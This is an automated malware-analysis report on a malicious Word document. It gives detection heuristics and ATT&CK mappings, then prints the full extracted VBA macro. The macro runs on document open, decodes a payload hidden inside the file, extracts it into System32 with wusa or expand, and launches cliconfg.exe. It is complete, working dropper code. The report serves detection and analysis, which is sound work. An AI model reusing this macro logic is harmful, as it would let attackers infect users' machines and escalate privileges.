Verdict: MALICIOUS
Risk Score: 408

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059.003 Windows Command Shell
- T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. Critical heuristics indicate the use of WScript.Shell and cmd.exe, along with a Shell() call, suggesting the macros are designed to execute arbitrary commands. The presence of a Document_Open macro and the ClamAV detection as 'Doc.Dropper.Agent' strongly indicate that this document acts as a dropper for a second-stage payload.
Heuristics (10)

- ClamAV: Doc.Dropper.Agent-6438391-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6438391-0
- VBA macros detected (medium, OLE_VBA_MACROS, 7 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script:
  `If System.Version >= "6.0" Then nResult = Shell("cmd /c wusa %TEMP%\setup.cab /quiet /extract:%SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe", 0) Else`
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT): WScript.Shell usage. Matched line in script:
  `Set oWscriptShell = CreateObject("WScript.Shell") sTempPath = oWscriptShell.ExpandEnvironmentStrings("%TEMP%")`
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script:
  `Set oWscriptShell = CreateObject("WScript.Shell") sTempPath = oWscriptShell.ExpandEnvironmentStrings("%TEMP%")`
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call. Matched line in script:
  `proc_query = "SELECT * FROM Win32_Processor" Set proc_results = GetObject("Winmgmts:").ExecQuery(proc_query) For Each info In proc_results`
- cmd.exe reference in VBA (high, OLE_VBA_CMD): cmd.exe reference in VBA. Matched line in script:
  `If System.Version >= "6.0" Then nResult = Shell("cmd /c wusa %TEMP%\setup.cab /quiet /extract:%SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe", 0) Else`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched line in script:
  `End Function Private Sub Document_Open() With ActiveDocument.Content`
- Reference to Windows Script Host (high, SC_STR_WSCRIPT): Reference to Windows Script Host
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3636 bytes |

SHA-256 of macros.bas: 06502a1e57707972f80d60c71cd4d8855da061884b895c72e766f5a5aca9f2e0
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Dim nResult As Long
Dim sFileName As String
Dim sTempPath As String
Dim sTempFile As String
Dim cbFileBuffer As Long

Private Function debase64(InputFile As String, nOffset As Long, nCount As Long, OutputFile As String) As Long
    Dim strKey As String
    Dim lpInBuffer
    Dim lpOutBuffer() As Byte
    Dim chr1, chr2, chr3, enc1, enc2, enc3, enc4 As Byte
    Dim nIndex, nResult As Long
    strKey = "KXU/yP=B29tLzidqNRuf-SbVInw0oCrmWZk6OpFc7A5GTD1QxaJ3H8h4jMeEsYglv"
    Open InputFile For Binary As #1
    Seek #1, nOffset + 1
    lpInBuffer = Input(nCount, #1)
    Close #1
    ReDim lpOutBuffer(nCount) As Byte
    nIndex = 1
    nResult = 0
    Do While nIndex <= nCount
        enc1 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
        nIndex = nIndex + 1
        enc2 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
        nIndex = nIndex + 1
        enc3 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
        nIndex = nIndex + 1
        enc4 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
        nIndex = nIndex + 1
        chr1 = (enc1 * 4) Or (enc2 \ 16)
        chr2 = ((enc2 And 15) * 16) Or (enc3 \ 4)
        chr3 = ((enc3 And 3) * 64) Or enc4
        lpOutBuffer(nResult) = chr1
        nResult = nResult + 1
        If enc3 <> 64 Then
            lpOutBuffer(nResult) = chr2
            nResult = nResult + 1
        End If
        If enc4 <> 64 Then
            lpOutBuffer(nResult) = chr3
            nResult = nResult + 1
        End If
    Loop
    ReDim Preserve lpOutBuffer(nResult - 1) As Byte
    Open OutputFile For Binary As #2
    Put #2, , lpOutBuffer
    Close #2
    debase64 = nResult
End Function

Private Function IsWin64() As Boolean
    Dim proc_query As String
    Dim proc_results As Object
    Dim info As Object
    Dim IsWin32OrWin64 As String
    proc_query = "SELECT * FROM Win32_Processor"
    Set proc_results = GetObject("Winmgmts:").ExecQuery(proc_query)
    For Each info In proc_results
        IsWin32OrWin64 = "Win" & info.AddressWidth
    Next info
    If IsWin32OrWin64 = "Win32" Then
        IsWin64 = False
    Else
        IsWin64 = True
    End If
End Function

Private Sub Document_Open()
    With ActiveDocument.Content
        .Font.ColorIndex = wdBlack
        '.Paragraphs(4).Range.Font.ColorIndex = wdRed
    End With
    Set oWscriptShell = CreateObject("WScript.Shell")
    sTempPath = oWscriptShell.ExpandEnvironmentStrings("%TEMP%")
    sFileName = ActiveDocument.FullName
    cbFileBuffer = FileLen(sFileName)
    If (cbFileBuffer = 81411) Then
        sTempFile = sTempPath & "\setup.cab"
        nResult = InStr(Application.Path, "x86")
        nResult = debase64(sFileName, 50176, 31235, sTempFile)
        If System.Version >= "6.0" Then
            nResult = Shell("cmd /c wusa %TEMP%\setup.cab /quiet /extract:%SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe", 0)
        Else
            nResult = Shell("cmd /c expand %TEMP%\setup.cab -F:* %SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe", 0)
        End If
    End If
End Sub
```